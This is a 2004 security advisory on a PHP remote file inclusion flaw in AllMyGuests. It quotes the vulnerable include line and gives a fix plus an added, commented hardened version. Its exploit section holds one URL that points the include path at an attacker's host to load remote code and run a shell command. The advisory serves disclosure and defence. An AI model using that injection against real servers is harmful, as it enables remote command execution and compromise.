
AllMyGuests PHP Code Injection vulnerability



******** AllMyGuests PHP Code Injection vulnerability ********



Product : AllMyGuests

Vendor : www.php-resource.net 

Date : February 14, 2004

Problem : PHP Code Injection

Vendor Contacted ? : No



************************** Source ****************************



in /include/info.inc.php



--------------------------------------------------------------



$AMG_info_get = require_once("$_AMGconfig[cfg_serverpath]"."/include/template.inc.php");



--------------------------------------------------------------



************************** Exploit ***************************



http://[target]/allmylinks/include/info.inc.php?_AMGconfig[cfg_serverpath]=http://[attacker]/&cmd=uname%20-a



and http://[attacker]/include/template.inc.php contains:



------------------------







------------------------



************************** Impact ****************************



A malicious user can execute arbitrary commands on the server.



************************* Solution ***************************



in /include/info.inc.php replace 



$AMG_info_get = require_once("$_AMGconfig[cfg_serverpath]"."/include/template.inc.php");





with





// Abort if cfg_serverpath is already set when this include runs, i.e. it was
// supplied by the request (register_globals) instead of the configuration.
if (isset($_AMGconfig['cfg_serverpath'])) {

  die("Don't Hack it :)");

}



$AMG_info_get = require_once("$_AMGconfig[cfg_serverpath]"."/include/template.inc.php"); 
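A hardened version of the same include, added here as an example and not taken from the advisory or from AllMyGuests. It assumes a Unix host, that the application root is the parent directory of /include, and that the front controller loads $_AMGconfig['cfg_serverpath'] from the config file before including this file:

```php
<?php
// Added example (not code from the advisory or from AllMyGuests): a hardened
// replacement for the include at the top of /include/info.inc.php.
// Assumptions: Unix host, application root is the parent of /include, and the
// front controller loads $_AMGconfig['cfg_serverpath'] from the config file
// before this file is included.

// 1. Refuse direct requests to this include; the exploit in the advisory
//    calls it directly, bypassing the code that sets up $_AMGconfig.
if (realpath($_SERVER['SCRIPT_FILENAME']) === realpath(__FILE__)) {
    header('HTTP/1.1 403 Forbidden');
    exit('Direct access not permitted.');
}

// 2. Refuse a config array that came from the request (register_globals):
//    a legitimate config never travels in GET, POST or cookies.
foreach (array($_GET, $_POST, $_COOKIE) as $source) {
    if (isset($source['_AMGconfig'])) {
        header('HTTP/1.1 400 Bad Request');
        exit('Invalid request.');
    }
}

// 3. Accept cfg_serverpath only if it is a local directory under the
//    application root; return the template path or false.
function amg_safe_template_path($cfgServerPath, $appRoot)
{
    // Anything with a scheme (http://, ftp://, php://, data:) is not a path.
    if (!is_string($cfgServerPath) || preg_match('#^[a-z][a-z0-9+.-]*:#i', $cfgServerPath)) {
        return false;
    }
    // realpath() resolves symlinks and "..", so the prefix test is meaningful.
    $resolved = realpath($cfgServerPath);
    if ($resolved === false || strpos($resolved . '/', $appRoot . '/') !== 0) {
        return false;
    }
    $template = $resolved . '/include/template.inc.php';
    return is_file($template) ? $template : false;
}

$appRoot  = realpath(dirname(__FILE__) . '/..');
$template = isset($_AMGconfig['cfg_serverpath'])
    ? amg_safe_template_path($_AMGconfig['cfg_serverpath'], $appRoot)
    : false;
if ($template === false) {
    header('HTTP/1.1 500 Internal Server Error');  // fail closed, no fallback
    exit('Template path is missing or invalid.');
}
$AMG_info_get = require_once $template;
```

Unlike the check above, this version keeps working when the configuration legitimately sets cfg_serverpath, because it rejects the value only when it comes from the request or points outside the application tree.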



************************** Credits ****************************



bnfx : bnfx@antisocial.com 



Mad_Skater : m4dsk4t3r@hotmail.com 



TechTeam Brazilian Crew.

